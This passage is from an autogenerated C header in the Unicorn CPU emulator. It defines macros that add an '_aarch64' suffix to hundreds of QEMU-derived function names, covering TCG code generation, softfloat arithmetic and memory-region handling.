UNICORN_AUTOGEN_aarch64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _aarch64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_aarch64 #define reg_read reg_read_aarch64 #define reg_write reg_write_aarch64 #define uc_init uc_init_aarch64 #define uc_add_inline_hook uc_add_inline_hook_aarch64 #define uc_del_inline_hook uc_del_inline_hook_aarch64 #define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64 #define use_idiv_instructions use_idiv_instructions_aarch64 #define arm_arch arm_arch_aarch64 #define tb_target_set_jmp_target tb_target_set_jmp_target_aarch64 #define have_bmi1 have_bmi1_aarch64 #define have_popcnt have_popcnt_aarch64 #define have_avx1 have_avx1_aarch64 #define have_avx2 have_avx2_aarch64 #define have_isa have_isa_aarch64 #define have_altivec have_altivec_aarch64 #define have_vsx have_vsx_aarch64 #define flush_icache_range flush_icache_range_aarch64 #define s390_facilities s390_facilities_aarch64 #define tcg_dump_op tcg_dump_op_aarch64 #define tcg_dump_ops tcg_dump_ops_aarch64 #define tcg_gen_and_i64 tcg_gen_and_i64_aarch64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_aarch64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_aarch64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_aarch64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_aarch64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_aarch64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_aarch64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_aarch64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_aarch64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_aarch64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_aarch64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_aarch64 #define tcg_gen_or_i64 tcg_gen_or_i64_aarch64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_aarch64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_aarch64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_aarch64 #define tcg_gen_st_i64 tcg_gen_st_i64_aarch64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_aarch64 #define cpu_icount_to_ns cpu_icount_to_ns_aarch64 #define cpu_is_stopped cpu_is_stopped_aarch64 #define cpu_get_ticks cpu_get_ticks_aarch64 #define cpu_get_clock cpu_get_clock_aarch64 #define cpu_resume cpu_resume_aarch64 #define qemu_init_vcpu qemu_init_vcpu_aarch64 #define cpu_stop_current cpu_stop_current_aarch64 #define resume_all_vcpus resume_all_vcpus_aarch64 #define vm_start vm_start_aarch64 #define address_space_dispatch_compact address_space_dispatch_compact_aarch64 #define flatview_translate flatview_translate_aarch64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_aarch64 #define qemu_get_cpu qemu_get_cpu_aarch64 #define cpu_address_space_init cpu_address_space_init_aarch64 #define cpu_get_address_space cpu_get_address_space_aarch64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_aarch64 #define cpu_exec_initfn cpu_exec_initfn_aarch64 #define cpu_exec_realizefn cpu_exec_realizefn_aarch64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_aarch64 #define cpu_watchpoint_insert cpu_watchpoint_insert_aarch64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_aarch64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_aarch64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_aarch64 #define cpu_breakpoint_insert cpu_breakpoint_insert_aarch64 #define cpu_breakpoint_remove cpu_breakpoint_remove_aarch64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_aarch64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_aarch64 #define cpu_abort cpu_abort_aarch64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_aarch64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_aarch64 #define flatview_add_to_dispatch flatview_add_to_dispatch_aarch64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_aarch64 #define qemu_ram_get_offset qemu_ram_get_offset_aarch64 #define qemu_ram_get_used_length qemu_ram_get_used_length_aarch64 #define qemu_ram_is_shared qemu_ram_is_shared_aarch64 #define qemu_ram_pagesize qemu_ram_pagesize_aarch64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_aarch64 #define qemu_ram_alloc qemu_ram_alloc_aarch64 #define qemu_ram_free qemu_ram_free_aarch64 #define qemu_map_ram_ptr qemu_map_ram_ptr_aarch64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_aarch64 #define qemu_ram_block_from_host qemu_ram_block_from_host_aarch64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_aarch64 #define cpu_check_watchpoint cpu_check_watchpoint_aarch64 #define iotlb_to_section iotlb_to_section_aarch64 #define address_space_dispatch_new address_space_dispatch_new_aarch64 #define address_space_dispatch_free address_space_dispatch_free_aarch64 #define flatview_read_continue flatview_read_continue_aarch64 #define address_space_read_full address_space_read_full_aarch64 #define address_space_write address_space_write_aarch64 #define address_space_rw address_space_rw_aarch64 #define cpu_physical_memory_rw cpu_physical_memory_rw_aarch64 #define address_space_write_rom address_space_write_rom_aarch64 #define cpu_flush_icache_range cpu_flush_icache_range_aarch64 #define cpu_exec_init_all cpu_exec_init_all_aarch64 #define address_space_access_valid address_space_access_valid_aarch64 #define address_space_map address_space_map_aarch64 #define address_space_unmap address_space_unmap_aarch64 #define cpu_physical_memory_map cpu_physical_memory_map_aarch64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_aarch64 #define cpu_memory_rw_debug cpu_memory_rw_debug_aarch64 #define qemu_target_page_size qemu_target_page_size_aarch64 #define qemu_target_page_bits qemu_target_page_bits_aarch64 #define qemu_target_page_bits_min qemu_target_page_bits_min_aarch64 #define target_words_bigendian target_words_bigendian_aarch64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_aarch64 #define ram_block_discard_range ram_block_discard_range_aarch64 #define ramblock_is_pmem ramblock_is_pmem_aarch64 #define page_size_init page_size_init_aarch64 #define set_preferred_target_page_bits set_preferred_target_page_bits_aarch64 #define finalize_target_page_bits finalize_target_page_bits_aarch64 #define cpu_outb cpu_outb_aarch64 #define cpu_outw cpu_outw_aarch64 #define cpu_outl cpu_outl_aarch64 #define cpu_inb cpu_inb_aarch64 #define cpu_inw cpu_inw_aarch64 #define cpu_inl cpu_inl_aarch64 #define memory_map memory_map_aarch64 #define memory_map_io memory_map_io_aarch64 #define memory_map_ptr memory_map_ptr_aarch64 #define memory_cow memory_cow_aarch64 #define memory_unmap memory_unmap_aarch64 #define memory_moveout memory_moveout_aarch64 #define memory_movein memory_movein_aarch64 #define memory_free memory_free_aarch64 #define flatview_unref flatview_unref_aarch64 #define address_space_get_flatview address_space_get_flatview_aarch64 #define memory_region_transaction_begin memory_region_transaction_begin_aarch64 #define memory_region_transaction_commit memory_region_transaction_commit_aarch64 #define memory_region_init memory_region_init_aarch64 #define memory_region_access_valid memory_region_access_valid_aarch64 #define memory_region_dispatch_read memory_region_dispatch_read_aarch64 #define memory_region_dispatch_write memory_region_dispatch_write_aarch64 #define memory_region_init_io memory_region_init_io_aarch64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_aarch64 #define memory_region_size memory_region_size_aarch64 #define memory_region_set_readonly memory_region_set_readonly_aarch64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_aarch64 #define memory_region_from_host memory_region_from_host_aarch64 #define memory_region_get_ram_addr memory_region_get_ram_addr_aarch64 #define memory_region_add_subregion memory_region_add_subregion_aarch64 #define memory_region_del_subregion memory_region_del_subregion_aarch64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_aarch64 #define memory_region_find memory_region_find_aarch64 #define memory_region_filter_subregions memory_region_filter_subregions_aarch64 #define memory_listener_register memory_listener_register_aarch64 #define memory_listener_unregister memory_listener_unregister_aarch64 #define address_space_remove_listeners address_space_remove_listeners_aarch64 #define address_space_init address_space_init_aarch64 #define address_space_destroy address_space_destroy_aarch64 #define memory_region_init_ram memory_region_init_ram_aarch64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_aarch64 #define find_memory_mapping find_memory_mapping_aarch64 #define exec_inline_op exec_inline_op_aarch64 #define floatx80_default_nan floatx80_default_nan_aarch64 #define float_raise float_raise_aarch64 #define float16_is_quiet_nan float16_is_quiet_nan_aarch64 #define float16_is_signaling_nan float16_is_signaling_nan_aarch64 #define float32_is_quiet_nan float32_is_quiet_nan_aarch64 #define float32_is_signaling_nan float32_is_signaling_nan_aarch64 #define float64_is_quiet_nan float64_is_quiet_nan_aarch64 #define float64_is_signaling_nan float64_is_signaling_nan_aarch64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_aarch64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_aarch64 #define floatx80_silence_nan floatx80_silence_nan_aarch64 #define propagateFloatx80NaN propagateFloatx80NaN_aarch64 #define float128_is_quiet_nan float128_is_quiet_nan_aarch64 #define float128_is_signaling_nan float128_is_signaling_nan_aarch64 #define float128_silence_nan float128_silence_nan_aarch64 #define float16_add float16_add_aarch64 #define float16_sub float16_sub_aarch64 #define float32_add float32_add_aarch64 #define float32_sub float32_sub_aarch64 #define float64_add float64_add_aarch64 #define float64_sub float64_sub_aarch64 #define float16_mul float16_mul_aarch64 #define float32_mul float32_mul_aarch64 #define float64_mul float64_mul_aarch64 #define float16_muladd float16_muladd_aarch64 #define float32_muladd float32_muladd_aarch64 #define float64_muladd float64_muladd_aarch64 #define float16_div float16_div_aarch64 #define float32_div float32_div_aarch64 #define float64_div float64_div_aarch64 #define float16_to_float32 float16_to_float32_aarch64 #define float16_to_float64 float16_to_float64_aarch64 #define float32_to_float16 float32_to_float16_aarch64 #define float32_to_float64 float32_to_float64_aarch64 #define float64_to_float16 float64_to_float16_aarch64 #define float64_to_float32 float64_to_float32_aarch64 #define float16_round_to_int float16_round_to_int_aarch64 #define float32_round_to_int float32_round_to_int_aarch64 #define float64_round_to_int float64_round_to_int_aarch64 #define float16_to_int16_scalbn float16_to_int16_scalbn_aarch64 #define float16_to_int32_scalbn float16_to_int32_scalbn_aarch64 #define float16_to_int64_scalbn float16_to_int64_scalbn_aarch64 #define float32_to_int16_scalbn float32_to_int16_scalbn_aarch64 #define float32_to_int32_scalbn float32_to_int32_scalbn_aarch64 #define float32_to_int64_scalbn float32_to_int64_scalbn_aarch64 #define float64_to_int16_scalbn float64_to_int16_scalbn_aarch64 #define float64_to_int32_scalbn float64_to_int32_scalbn_aarch64 #define float64_to_int64_scalbn float64_to_int64_scalbn_aarch64 #define float16_to_int16 float16_to_int16_aarch64 #define float16_to_int32 float16_to_int32_aarch64 #define float16_to_int64 float16_to_int64_aarch64 #define float32_to_int16 float32_to_int16_aarch64 #define float32_to_int32 float32_to_int32_aarch64 #define float32_to_int64 float32_to_int64_aarch64 #define float64_to_int16 float64_to_int16_aarch64 #define float64_to_int32 float64_to_int32_aarch64 #define float64_to_int64 float64_to_int64_aarch64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_aarch64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_aarch64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_aarch64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_aarch64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_aarch64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_aarch64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_aarch64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_aarch64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_aarch64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_aarch64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_aarch64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_aarch64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_aarch64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_aarch64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_aarch64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_aarch64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_aarch64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_aarch64 #define float16_to_uint16 float16_to_uint16_aarch64 #define float16_to_uint32 float16_to_uint32_aarch64 #define float16_to_uint64 float16_to_uint64_aarch64 #define float32_to_uint16 float32_to_uint16_aarch64 #define float32_to_uint32 float32_to_uint32_aarch64 #define float32_to_uint64 float32_to_uint64_aarch64 #define float64_to_uint16 float64_to_uint16_aarch64 #define float64_to_uint32 float64_to_uint32_aarch64 #define float64_to_uint64 float64_to_uint64_aarch64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_aarch64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_aarch64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_aarch64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_aarch64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_aarch64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_aarch64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_aarch64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_aarch64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_aarch64 #define int64_to_float16_scalbn int64_to_float16_scalbn_aarch64 #define int32_to_float16_scalbn int32_to_float16_scalbn_aarch64 #define int16_to_float16_scalbn int16_to_float16_scalbn_aarch64 #define int64_to_float16 int64_to_float16_aarch64 #define int32_to_float16 int32_to_float16_aarch64 #define int16_to_float16 int16_to_float16_aarch64 #define int64_to_float32_scalbn int64_to_float32_scalbn_aarch64 #define int32_to_float32_scalbn int32_to_float32_scalbn_aarch64 #define int16_to_float32_scalbn int16_to_float32_scalbn_aarch64 #define int64_to_float32 int64_to_float32_aarch64 #define int32_to_float32 int32_to_float32_aarch64 #define int16_to_float32 int16_to_float32_aarch64 #define int64_to_float64_scalbn int64_to_float64_scalbn_aarch64 #define int32_to_float64_scalbn int32_to_float64_scalbn_aarch64 #define int16_to_float64_scalbn int16_to_float64_scalbn_aarch64 #define int64_to_float64 int64_to_float64_aarch64 #define int32_to_float64 int32_to_float64_aarch64 #define int16_to_float64 int16_to_float64_aarch64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_aarch64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_aarch64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_aarch64 #define uint64_to_float16 uint64_to_float16_aarch64 #define uint32_to_float16 uint32_to_float16_aarch64 #define uint16_to_float16 uint16_to_float16_aarch64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_aarch64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_aarch64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_aarch64 #define uint64_to_float32 uint64_to_float32_aarch64 #define uint32_to_float32 uint32_to_float32_aarch64 #define uint16_to_float32 uint16_to_float32_aarch64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_aarch64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_aarch64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_aarch64 #define uint64_to_float64 uint64_to_float64_aarch64 #define uint32_to_float64 uint32_to_float64_aarch64 #define uint16_to_float64 uint16_to_float64_aarch64 #define float16_min float16_min_aarch64 #define float16_minnum float16_minnum_aarch64 #define float16_minnummag float16_minnummag_aarch64 #define float16_max float16_max_aarch64 #define float16_maxnum float16_maxnum_aarch64 #define float16_maxnummag float16_maxnummag_aarch64 #define float32_min float32_min_aarch64 #define float32_minnum float32_minnum_aarch64 #define float32_minnummag float32_minnummag_aarch64 #define float32_max float32_max_aarch64 #define float32_maxnum float32_maxnum_aarch64 #define float32_maxnummag float32_maxnummag_aarch64 #define float64_min float64_min_aarch64 #define float64_minnum float64_minnum_aarch64 #define float64_minnummag float64_minnummag_aarch64 #define float64_max float64_max_aarch64 #define float64_maxnum float64_maxnum_aarch64 #define float64_maxnummag float64_maxnummag_aarch64 #define float16_compare float16_compare_aarch64 #define float16_compare_quiet float16_compare_quiet_aarch64 #define float32_compare float32_compare_aarch64 #define float32_compare_quiet float32_compare_quiet_aarch64 #define float64_compare float64_compare_aarch64 #define float64_compare_quiet float64_compare_quiet_aarch64 #define float16_scalbn float16_scalbn_aarch64 #define float32_scalbn float32_scalbn_aarch64 #define float64_scalbn float64_scalbn_aarch64 #define float16_sqrt float16_sqrt_aarch64 #define float32_sqrt float32_sqrt_aarch64 #define float64_sqrt float64_sqrt_aarch64 #define float16_default_nan float16_default_nan_aarch64 #define float32_default_nan float32_default_nan_aarch64 #define float64_default_nan float64_default_nan_aarch64 #define float128_default_nan float128_default_nan_aarch64 #define float16_silence_nan float16_silence_nan_aarch64 #define float32_silence_nan float32_silence_nan_aarch64 #define float64_silence_nan float64_silence_nan_aarch64 #define float16_squash_input_denormal float16_squash_input_denormal_aarch64 #define float32_squash_input_denormal float32_squash_input_denormal_aarch64 #define float64_squash_input_denormal float64_squash_input_denormal_aarch64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_aarch64 #define roundAndPackFloatx80 roundAndPackFloatx80_aarch64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_aarch64 #define int32_to_floatx80 int32_to_floatx80_aarch64 #define int32_to_float128 int32_to_float128_aarch64 #define int64_to_floatx80 int64_to_floatx80_aarch64 #define int64_to_float128 int64_to_float128_aarch64 #define uint64_to_float128 uint64_to_float128_aarch64 #define float32_to_floatx80 float32_to_floatx80_aarch64 #define float32_to_float128 float32_to_float128_aarch64 #define float32_rem float32_rem_aarch64 #define float32_exp2 float32_exp2_aarch64 #define float32_log2 float32_log2_aarch64 #define float32_eq float32_eq_aarch64 #define float32_le float32_le_aarch64 #define float32_lt float32_lt_aarch64 #define float32_unordered float32_unordered_aarch64 #define float32_eq_quiet float32_eq_quiet_aarch64 #define float32_le_quiet float32_le_quiet_aarch64 #define float32_lt_quiet float32_lt_quiet_aarch64 #define float32_unordered_quiet float32_unordered_quiet_aarch64 #define float64_to_floatx80 float64_to_floatx80_aarch64 #define float64_to_float128 float64_to_float128_aarch64 #define float64_rem float64_rem_aarch64 #define float64_log2 float64_log2_aarch64 #define float64_eq float64_eq_aarch64 #define float64_le float64_le_aarch64 #define float64_lt float64_lt_aarch64 #define float64_unordered float64_unordered_aarch64 #define float64_eq_quiet float64_eq_quiet_aarch64 #define float64_le_quiet float64_le_quiet_aarch64 #define float64_lt_quiet float64_lt_quiet_aarch64 #define float64_unordered_quiet float64_unordered_quiet_aarch64 #define floatx80_to_int32 floatx80_to_int32_aarch64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_aarch64 #define floatx80_to_int64 floatx80_to_int64_aarch64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_aarch64 #define floatx80_to_float32 floatx80_to_float32_aarch64 #define floatx80_to_float64 floatx80_to_float64_aarch64 #define floatx80_to_float128 floatx80_to_float128_aarch64 #define floatx80_round floatx80_round_aarch64 #define floatx80_round_to_int floatx80_round_to_int_aarch64 #define floatx80_add floatx80_add_aarch64 #define floatx80_sub floatx80_sub_aarch64 #define floatx80_mul floatx80_mul_aarch64 #define floatx80_div floatx80_div_aarch64 #define floatx80_rem floatx80_rem_aarch64 #define floatx80_sqrt floatx80_sqrt_aarch64 #define floatx80_eq floatx80_eq_aarch64 #define floatx80_le floatx80_le_aarch64 #define floatx80_lt floatx80_lt_aarch64 #define floatx80_unordered floatx80_unordered_aarch64 #define floatx80_eq_quiet floatx80_eq_quiet_aarch64 #define floatx80_le_quiet floatx80_le_quiet_aarch64 #define floatx80_lt_quiet floatx80_lt_quiet_aarch64 #define floatx80_unordered_quiet floatx80_unordered_quiet_aarch64 #define float128_to_int32 float128_to_int32_aarch64 #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_aarch64 #define float128_to_int64 float128_to_int64_aarch64 #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_aarch64 #define float128_to_uint64 float128_to_uint64_aarch64 #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_aarch64 #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_aarch64 #define float128_to_uint32 float128_to_uint32_aarch64 #define float128_to_float32 float128_to_float32_aarch64 #define float128_to_float64 float128_to_float64_aarch64 #define float128_to_floatx80 float128_to_floatx80_aarch64 #define float128_round_to_int float128_round_to_int_aarch64 #define float128_add float128_add_aarch64 #define float128_sub float128_sub_aarch64 #define float128_mul float128_mul_aarch64 #define float128_div float128_div_aarch64 #define float128_rem float128_rem_aarch64 #define float128_sqrt float128_sqrt_aarch64 #define float128_eq float128_eq_aarch64 #define float128_le float128_le_aarch64 #define float128_lt float128_lt_aarch64 #define float128_unordered float128_unordered_aarch64 #define float128_eq_quiet float128_eq_quiet_aarch64 #define float128_le_quiet float128_le_quiet_aarch64 #define float128_lt_quiet float128_lt_quiet_aarch64 #define float128_unordered_quiet float128_unordered_quiet_aarch64 #define floatx80_compare floatx80_compare_aarch64 #define floatx80_compare_quiet floatx80_compare_quiet_aarch64 #define float128_compare float128_compare_aarch64 #define float128_compare_quiet float128_compare_quiet_aarch64 #define floatx80_scalbn floatx80_scalbn_aarch64 #define float128_scalbn float128_scalbn_aarch64 #define softfloat_init softfloat_init_aarch64 #define tcg_optimize tcg_optimize_aarch64 #define gen_new_label gen_new_label_aarch64 #define tcg_can_emit_vec_op tcg_can_emit_vec_op_aarch64 #define tcg_expand_vec_op tcg_expand_vec_op_aarch64 #define tcg_register_jit tcg_register_jit_aarch64 #define tcg_tb_insert tcg_tb_insert_aarch64 #define tcg_tb_remove tcg_tb_remove_aarch64 #define tcg_tb_lookup tcg_tb_lookup_aarch64 #define tcg_tb_foreach tcg_tb_foreach_aarch64 #define tcg_nb_tbs tcg_nb_tbs_aarch64 #define tcg_region_reset_all tcg_region_reset_all_aarch64 #define tcg_region_init tcg_region_init_aarch64 #define tcg_code_size tcg_code_size_aarch64 #define tcg_code_capacity tcg_code_capacity_aarch64 #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_aarch64 #define tcg_malloc_internal tcg_malloc_internal_aarch64 #define tcg_pool_reset tcg_pool_reset_aarch64 #define tcg_context_init tcg_context_init_aarch64 #define tcg_tb_alloc tcg_tb_alloc_aarch64 #define tcg_prologue_init tcg_prologue_init_aarch64 #define tcg_func_start tcg_func_start_aarch64 #define tcg_set_frame tcg_set_frame_aarch64 #define tcg_global_mem_new_internal tcg_global_mem_new_internal_aarch64 #define tcg_temp_new_internal tcg_temp_new_internal_aarch64 #define tcg_temp_new_vec tcg_temp_new_vec_aarch64 #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_aarch64 #define tcg_temp_free_internal tcg_temp_free_internal_aarch64 #define tcg_const_i32 tcg_const_i32_aarch64 #define tcg_const_i64 tcg_const_i64_aarch64 #define tcg_const_local_i32 tcg_const_local_i32_aarch64 #define tcg_const_local_i64 tcg_const_local_i64_aarch64 #define tcg_op_supported tcg_op_supported_aarch64 #define tcg_gen_callN tcg_gen_callN_aarch64 #define tcg_op_remove tcg_op_remove_aarch64 #define tcg_emit_op tcg_emit_op_aarch64 #define tcg_op_insert_before tcg_op_insert_before_aarch64 #define tcg_op_insert_after tcg_op_insert_after_aarch64 #define tcg_cpu_exec_time tcg_cpu_exec_time_aarch64 #define tcg_gen_code tcg_gen_code_aarch64 #define tcg_gen_op1 tcg_gen_op1_aarch64 #define tcg_gen_op2 tcg_gen_op2_aarch64 #define tcg_gen_op3 tcg_gen_op3_aarch64 #define tcg_gen_op4 tcg_gen_op4_aarch64 #define tcg_gen_op5 tcg_gen_op5_aarch64 #define tcg_gen_op6 tcg_gen_op6_aarch64 #define tcg_gen_mb tcg_gen_mb_aarch64 #define tcg_gen_addi_i32 tcg_gen_addi_i32_aarch64 #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_aarch64 #define tcg_gen_subi_i32 tcg_gen_subi_i32_aarch64 #define tcg_gen_andi_i32 tcg_gen_andi_i32_aarch64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_aarch64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_aarch64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_aarch64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_aarch64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_aarch64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_aarch64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_aarch64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_aarch64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_aarch64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_aarch64 #define tcg_gen_div_i32 tcg_gen_div_i32_aarch64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_aarch64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_aarch64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_aarch64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_aarch64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_aarch64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_aarch64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_aarch64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_aarch64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_aarch64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_aarch64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_aarch64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_aarch64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_aarch64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_aarch64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_aarch64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_aarch64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_aarch64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_aarch64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_aarch64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_aarch64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_aarch64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_aarch64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_aarch64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_aarch64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_aarch64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_aarch64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_aarch64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_aarch64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_aarch64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_aarch64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_aarch64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_aarch64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_aarch64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_aarch64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_aarch64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_aarch64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_aarch64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_aarch64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_aarch64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_aarch64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_aarch64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_aarch64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_aarch64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_aarch64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_aarch64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_aarch64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_aarch64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_aarch64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_aarch64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_aarch64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_aarch64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_aarch64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_aarch64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_aarch64 #define tcg_gen_div_i64 tcg_gen_div_i64_aarch64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_aarch64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_aarch64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_aarch64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_aarch64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_aarch64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_aarch64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_aarch64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_aarch64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_aarch64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_aarch64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_aarch64 #define tcg_gen_bswap64_i64 